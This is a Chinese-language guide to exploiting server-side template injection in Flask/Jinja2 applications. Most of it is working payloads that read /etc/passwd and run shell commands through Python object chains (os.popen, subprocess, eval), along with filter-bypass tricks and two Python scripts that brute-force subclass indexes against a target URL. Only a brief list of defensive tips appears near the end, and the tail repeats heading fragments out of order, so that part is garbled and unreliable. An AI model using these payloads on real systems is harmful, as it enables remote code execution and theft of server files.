SSTI（服务端模板注入）深入分析与利用指南<\/h1>

1. SSTI基础概念<\/h2>

1.1 什么是SSTI<\/h3>
SSTI（Server-Side Template Injection）即服务端模板注入，是由于接受用户输入而造成的安全问题，与SQL注入有相似性。其本质在于服务器端接受了用户的输入，未经充分过滤就将用户输入作为Web应用模板的一部分，在编译渲染过程中执行了恶意代码。<\/p>

1.2 模板与模板引擎<\/h3>
模板是一段包含可动态替换部分的文本，如`print("hello{username}")<\/code>。模板引擎的作用是将业务数据填充到模板中，生成特定文档（如HTML）。<\/p>`

2. Flask-Jinja2 SSTI利用<\/h2>
2.1 关键魔术方法<\/h3>


__class__<\/code><\/strong>：查看变量所属的类<\/p>
>>><\/span> ''<\/span>.<\/span>__class__
<\/span><\/span><<\/span>type 'str'<\/span>><\/span>
<\/span><\/span><\/code><\/pre><\/li>

__bases__<\/code><\/strong>：查看类的基类<\/p>
>>><\/span> ().<\/span>__class__.<\/span>__bases__
<\/span><\/span>(<<\/span>type 'object'<\/span>><\/span>,)
<\/span><\/span><\/code><\/pre><\/li>

__mro__<\/code><\/strong>：获取类的调用顺序<\/p>
>>><\/span> ''<\/span>.<\/span>__class__.<\/span>__mro__
<\/span><\/span>(<<\/span>class<\/span> '<\/span>str<\/span>'>, <class '<\/span>object'>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>

__subclasses__()<\/code><\/strong>：查看当前类的子类列表<\/p>
>>><\/span> ''<\/span>.<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()
<\/span><\/span>[<<\/span>class<\/span> '<\/span>type<\/span>'>, <class '<\/span>weakref'>, ...]<\/span>
<\/span><\/span><\/code><\/pre><\/li>

__globals__<\/code><\/strong>：返回函数全局变量的字典引用<\/p>
func.<\/span>__globals__
<\/span><\/span><\/code><\/pre><\/li>

__builtins__<\/code><\/strong>：查看所有内建函数<\/p>
__builtins__.<\/span>eval
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2 利用链构建<\/h3>
基本思路：<\/p>

找到父类<type 'object'><\/code><\/li>
寻找子类<\/li>
查找命令执行或文件操作模块<\/li>
<\/ol>
示例：<\/p>
# 获取object类<\/span>
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__[-<\/span>1<\/span>]  # 或 ''.__class__.__base__<\/span>
<\/span><\/span>
<\/span><\/span># 获取所有子类<\/span>
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__[-<\/span>1<\/span>].<\/span>__subclasses__()
<\/span><\/span>
<\/span><\/span># 查找可利用的子类<\/span>
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__[-<\/span>1<\/span>].<\/span>__subclasses__()[40<\/span>]  # 如file类<\/span>
<\/span><\/span><\/code><\/pre>3. 文件读取与命令执行<\/h2>
3.1 Python2环境<\/h3>
文件读取<\/strong>：<\/p>
[].<\/span>__class__.<\/span>__mro__[-<\/span>1<\/span>].<\/span>__subclasses__()[40<\/span>]("\/etc\/passwd"<\/span>).<\/span>read()
<\/span><\/span><\/code><\/pre>命令执行<\/strong>：<\/p>
# 使用os模块<\/span>
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[71<\/span>].<\/span>__init__.<\/span>__globals__['os'<\/span>].<\/span>popen('ls'<\/span>).<\/span>read()
<\/span><\/span>
<\/span><\/span># 使用subprocess<\/span>
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[258<\/span>]('ls'<\/span>, shell=<\/span>True<\/span>, stdout=-<\/span>1<\/span>).<\/span>communicate()[0<\/span>]
<\/span><\/span><\/code><\/pre>3.2 Python3环境<\/h3>
文件读取<\/strong>：<\/p>
().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[75<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['open'<\/span>]('\/etc\/passwd'<\/span>).<\/span>read()
<\/span><\/span><\/code><\/pre>命令执行<\/strong>：<\/p>
# 使用eval<\/span>
<\/span><\/span>().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[75<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]("__import__('os').popen('id').read()"<\/span>)
<\/span><\/span>
<\/span><\/span># 使用循环查找catch_warnings<\/span>
<\/span><\/span>{%<\/span> for<\/span> c in<\/span> [].<\/span>__class__.<\/span>__base__.<\/span>__subclasses__() %<\/span>}
<\/span><\/span>{%<\/span> if<\/span> c.<\/span>__name__ ==<\/span> 'catch_warnings'<\/span> %<\/span>}
<\/span><\/span>{{ c.<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>].<\/span>eval("__import__('os').popen('id').read()"<\/span>) }}
<\/span><\/span>{%<\/span> endif %<\/span>}
<\/span><\/span>{%<\/span> endfor %<\/span>}
<\/span><\/span><\/code><\/pre>4. 绕过技术<\/h2>
4.1 关键字绕过<\/h3>


拼接绕过<\/strong>：<\/p>
'o'<\/span>+<\/span>'s'<\/span>  # 代替'os'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

编码绕过<\/strong>：<\/p>

Base64：
'b3M='<\/span>.<\/span>decode('base64'<\/span>)  # 'os'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
Unicode：
'<\/span>\u006f\u0073<\/span>'<\/span>  # 'os'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
Hex：
'<\/span>\x6f\x73<\/span>'<\/span>  # 'os'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

引号绕过<\/strong>：<\/p>
fl""<\/span>ag  # 代替flag<\/span>
<\/span><\/span><\/code><\/pre><\/li>

join()<\/code>函数<\/strong>：<\/p>
"fla"<\/span>.<\/span>join("\/g"<\/span>)  # "\/flag"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.2 特殊字符绕过<\/h3>


中括号[]<\/code><\/strong>：<\/p>
__getitem__(0<\/span>)  # 代替[0]<\/span>
<\/span><\/span><\/code><\/pre><\/li>

下划线_<\/code><\/strong>：<\/p>
request.<\/span>args  # 通过请求参数传递<\/span>
<\/span><\/span><\/code><\/pre><\/li>

点.<\/code><\/strong>：<\/p>
|<\/span>attr("__class__"<\/span>)  # 代替.__class__<\/span>
<\/span><\/span><\/code><\/pre><\/li>

大括号{{<\/code><\/strong>：<\/p>
{% if ... %}...{% endif %}
<\/code><\/pre>
<\/li>
<\/ol>
4.3 综合绕过示例<\/h3>
过滤了.<\/code>、[]<\/code>、_<\/code><\/strong>：<\/p>
{{()|attr("__class__")|attr("__base__")|attr("__subclasses__")()|attr("__getitem__")(77)|attr("__init__")|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("ls")|attr("read")()}}
<\/code><\/pre>
过滤引号<\/strong>：<\/p>
# 使用request.values<\/span>
<\/span><\/span>{{lipsum.<\/span>__globals__.<\/span>os.<\/span>popen(request.<\/span>values.<\/span>cmd).<\/span>read()}}&<\/span>cmd=<\/span>ls
<\/span><\/span><\/code><\/pre>过滤数字<\/strong>：<\/p>
# 使用全角数字<\/span>
<\/span><\/span>().<\/span>__class__.<\/span>__bases__[０<\/span>].<\/span>__subclasses__()[１３２<\/span>]
<\/span><\/span><\/code><\/pre>5. 实用脚本<\/h2>
5.1 查找子类索引<\/h3>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(500<\/span>):
<\/span><\/span>    url =<\/span> f<\/span>"http:\/\/target\/?name=<\/span>{{<\/span>''.__class__.__bases__[0].__subclasses__()[<\/span>{<\/span>i}<\/span>]<\/span>}}<\/span>"<\/span>
<\/span><\/span>    res =<\/span> requests.<\/span>get(url)
<\/span><\/span>    if<\/span> 'FileLoader'<\/span> in<\/span> res.<\/span>text:
<\/span><\/span>        print(i)
<\/span><\/span><\/code><\/pre>5.2 字符构造脚本<\/h3>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/target\/?name={{config.__str__().__getitem__(<\/span>%d<\/span>)}}"<\/span>
<\/span><\/span>payload =<\/span> "cat \/flag"<\/span>
<\/span><\/span>result =<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> j in<\/span> payload:
<\/span><\/span>    for<\/span> i in<\/span> range(0<\/span>,1000<\/span>):
<\/span><\/span>        r =<\/span> requests.<\/span>get(url %<\/span> i)
<\/span><\/span>        location =<\/span> r.<\/span>text.<\/span>find("<h3>"<\/span>)
<\/span><\/span>        word =<\/span> r.<\/span>text[location+<\/span>4<\/span>:location+<\/span>5<\/span>]
<\/span><\/span>        if<\/span> word ==<\/span> j:
<\/span><\/span>            result +=<\/span> f<\/span>"config.__str__().__getitem__(<\/span>{<\/span>i}<\/span>)~"<\/span>
<\/span><\/span>            break<\/span>
<\/span><\/span>
<\/span><\/span>print(result[:-<\/span>1<\/span>])
<\/span><\/span><\/code><\/pre>6. 常见利用类<\/h2>


文件操作类<\/strong>：<\/p>

Python2: <type 'file'><\/code> (通常索引40)<\/li>
Python3: _frozen_importlib_external.FileLoader<\/code><\/li>
<\/ul>
<\/li>

命令执行类<\/strong>：<\/p>

warnings.catch_warnings<\/code><\/li>
subprocess.Popen<\/code><\/li>
os._wrap_close<\/code><\/li>
<\/ul>
<\/li>

内置函数类<\/strong>：<\/p>

__builtins__.eval<\/code><\/li>
__builtins__.open<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
7. Flask特殊对象<\/h2>


url_for<\/code><\/strong>：<\/p>
url_for.<\/span>__globals__['__builtins__'<\/span>]
<\/span><\/span><\/code><\/pre><\/li>

config<\/code><\/strong>：<\/p>
config.<\/span>__class__.<\/span>__init__.<\/span>__globals__['os'<\/span>]
<\/span><\/span><\/code><\/pre><\/li>

lipsum<\/code><\/strong>：<\/p>
lipsum.<\/span>__globals__.<\/span>os.<\/span>popen('ls'<\/span>).<\/span>read()
<\/span><\/span><\/code><\/pre><\/li>

request<\/code><\/strong>：<\/p>
request.<\/span>args.<\/span>x1  # GET参数<\/span>
<\/span><\/span>request.<\/span>values.<\/span>x1  # 所有参数<\/span>
<\/span><\/span>request.<\/span>cookies  # Cookie参数<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
8. 防御建议<\/h2>

避免直接将用户输入作为模板<\/li>
使用安全的模板渲染方式<\/li>
对用户输入进行严格过滤<\/li>
禁用危险的Python内置函数<\/li>
使用沙箱环境执行模板<\/li>
<\/ol>
通过深入理解这些技术点，可以有效地识别和利用SSTI漏洞，同时也能够更好地防御此类攻击。<\/p>

SSTI（服务端模板注入）深入分析与利用指南<\/h1>

1. SSTI基础概念<\/h2>

1.2 模板与模板引擎<\/h3> 模板是一段包含可动态替换部分的文本，如print("hello{username}")<\/code>。模板引擎的作用是将业务数据填充到模板中，生成特定文档（如HTML）。<\/p>

3. 文件读取与命令执行<\/h2>

4. 绕过技术<\/h2>

5. 实用脚本<\/h2>

1.2 模板与模板引擎<\/h3>
模板是一段包含可动态替换部分的文本，如`print("hello{username}")<\/code>。模板引擎的作用是将业务数据填充到模板中，生成特定文档（如HTML）。<\/p>`